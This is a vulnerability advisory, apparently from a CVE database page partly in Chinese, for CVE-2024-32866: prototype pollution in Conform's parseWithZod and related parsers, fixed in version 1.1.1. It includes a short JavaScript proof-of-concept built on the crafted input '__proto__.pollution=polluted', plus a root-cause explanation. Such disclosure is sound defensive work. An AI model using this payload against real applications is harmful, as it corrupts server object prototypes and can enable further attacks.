CVE-2024-32866
Conform contains a Prototype Pollution Vulnerability in `parseWith...` function
描述
### Summary Conform allows the parsing of nested objects in the form of `object.property`. Due to an improper implementation of this feature, an attacker can exploit it to trigger prototype pollution by passing a crafted input to `parseWith...` functions. ### PoC ```javascript const { parseWithZod } = require('@conform-to/zod'); const { z } = require("zod"); const param = new URLSearchParams("__proto__.pollution=polluted"); const schema = z.object({ "a": z.string() }); parseWithZod(param, { schema }); console.log("pollution:", ({}).pollution); // should print "polluted" ``` ### Details The invocation of the `parseWithZod` function in the above PoC triggers the `setValue` function through `getSubmissionContext` and `parse`, executing the following process, resulting in prototype pollution: ```javascript let pointer = value; pointer.__proto__ = pointer.__proto__; pointer = pointer.__proto__; pointer.polluted = "polluted"; ``` This is caused by the lack of object existence checking on [line 117 in formdata.ts](https://github.com/edmundhung/conform/blob/59156d7115a7207fa3b6f8a70a4342a9b24c2501/packages/conform-dom/formdata.ts#L117), where the code only checks for the presence of `pointer[key]` without proper validation. ### Impact Applications that use conform for server-side validation of form data or URL parameters are affected by this vulnerability.
如何修補 CVE-2024-32866
要修補 CVE-2024-32866,請將受影響套件升級到下列已修補版本。
- —升級至 1.1.1 或更新版本
- —升級至 1.1.1 或更新版本
- —升級至 1.1.1 或更新版本
CVE-2024-32866 正在被利用嗎?
低 — EPSS 為 0.2%,目前沒有觀察到大規模利用活動。
受影響套件(3)
- >= 1.0.0, < 1.1.1